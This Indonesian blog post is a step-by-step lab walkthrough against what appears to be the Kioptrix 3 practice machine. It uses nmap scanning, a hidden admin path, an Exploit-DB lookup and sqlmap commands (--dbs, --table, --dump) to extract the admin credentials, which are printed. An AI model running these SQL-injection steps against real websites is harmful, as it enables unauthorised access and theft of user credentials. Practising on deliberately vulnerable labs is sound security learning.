Hi, guest | Welcome to Blog Serba Guna | Register | Sign in
Dynamic Blinkie Text Generator at TextSpace.net

Selasa, 06 Desember 2011

Gaining User Password

. Selasa, 06 Desember 2011

Tutorial kali ini, saya akan menjelaskan tentang mendapatkan user name dan password pada sebuah website. Sebenarnya ngga konsen bikin tutorial ini, karena hari ini sedikit mengecewakan, dengan beberapa orang yang mengecewakan. Tapi setelah mandi, kepikiran untuk meneruskan karya-karya saya di dunia peretasan. 


Ok, langsung saja ke tutorial.


Preparation:
Nmap (bisa di dapatkan di sini)
Internet browser (kali ini saya menggunakan chromium)
Exploit db (bisa ditemukan di sini)
SQLmap (bisa didapatkan di sini )




Tetapkan target (kali ini target adalah kioptrix3.com


Catatan:
Semua tools ini bisa di dapatkan di <<back|track 5
Untuk internet browser, kamu bisa menggunakan browser apapun.
Dalam tutorial ini saya menggunakan OS <<back|track 5 GNOME 32 BIT
Briefing:
Mapping Local Area Network
Cari tau url halaman login
Gunakan Exploit-db untuk mencari vulnerability website tersebut
Gunakan SQLmap untuk melakukan proses SQL injection
Game over
Walkthrough:
1. Mapping Local Area Network


Buka terminal, kemudian masukan perintah:
root@red-dragon:~# nmap -sn 192.168.1.0/24




root@red-dragon:~# nmap -A 192.168.1.7



2. Cari tau url halaman login

Buka browser, kemudian tuju kioptrix3.com


Kemudian arahkan browser menuju kioptrix3.com/gallery/


Lihat source pada page tersebut, dan cari <!-- <a href="gadmin">Admin</a>&nbsp;&nbsp; -->


Mari kita coba, apakah halaman ini tersedia jika saya menambahkan "gadmin" (tanpa tanda petik).




Walaaaaa.. Saya berhasil mendapatkan halaman Log-In =)



3. Gunakan Exploit-db untuk mencari vulnerability website tersebut

Terlihat bahwa korban menggunakan Gallarific sebagai gallery managernya. Mari kita cari tau vulnerability yang dimiliki oleh gallarific.

Buka terminal, lalu masukan perintah:

root@red-dragon:~# cd /pentest/exploits/exploitdb/
kemudian
root@red-dragon:/pentest/exploits/exploitdb# grep -i gallarific files.csv

Ada 3 vulnerability yang dimikili oleh gallarific, kita akan mengambil fulnerability yang ke tiga. Yaitu "GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection". Masukan perintah:

root@red-dragon:/pentest/exploits/exploitdb# cat platforms/php/webapps/15891.txt



Terlihat bahwa target kita memiliki kelemahan pada url www.site.com/gallery.php?id=null


4. Gunakan SQLmap untuk melakukan proses SQL injection

Setelah mengetahui kelemahan target, sekarang saatnya melakukan SQL injection. Untuk mempercepat proses SQL ijection, saya menggunakan tools SQLmap yang sudah tersedia di <<back|track 5.

Buka terminal, lalu ketik:

root@red-dragon:/pentest/exploits/exploitdb# cd /pentest/database/sqlmap/

Penggunaan SQLmap tergolong mudah, formatnya adalah

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u [vulnerable url]

Pada tahap 3 tiga sudah mengetahui letak vulnerable url korban kita terdapat pada /gallery.php?id=null. Maka kita hanya perlu menambahkan kioptrix3.com/gallery sebelum /gallery.php?id=null. Maka perintah sqlmap adalah:


root@red-dragon
:/
pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null

Pada SQL injection ini, saya akan mencoba membongkar database target. Maka perintah sqlmap adalah:

root@red-dragon
:
/pentest/database/sqlmap# python sqlmap.py -ukioptrix3.com/gallery/gallery.php?id=null --dbs

Output:




Ada 3 database di sini:
gallery
information_schema
mysql
Saya akan menggunakan database gallery, dan mencoba mencari tau tabel apa saja yang ada pada database gallery. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery --table


Ada 7 table yang terdapat pada database gallery:
dev_accounts
gallarific_comments
gallarific_galleries
gallarific_photos
gallarific_settings
gallarific_stat
gallarific_users
Kemudian saya mencoba membongkar isi table pada gallarific_users. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T gallarific_users --dump


Banzaaaaaaaaai \(^o^)/
Kita sudak dapat user name dan password. Sekarang coba kita test. Dengan user name = admin, password = n0t7t1k4


Sekarang saya bisa melakukan apapun dengan website ini


Share this Article now on :
ARTIKEL YANG BERHUBUNGAN :


0 komentar:

:X ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( =))

Posting Komentar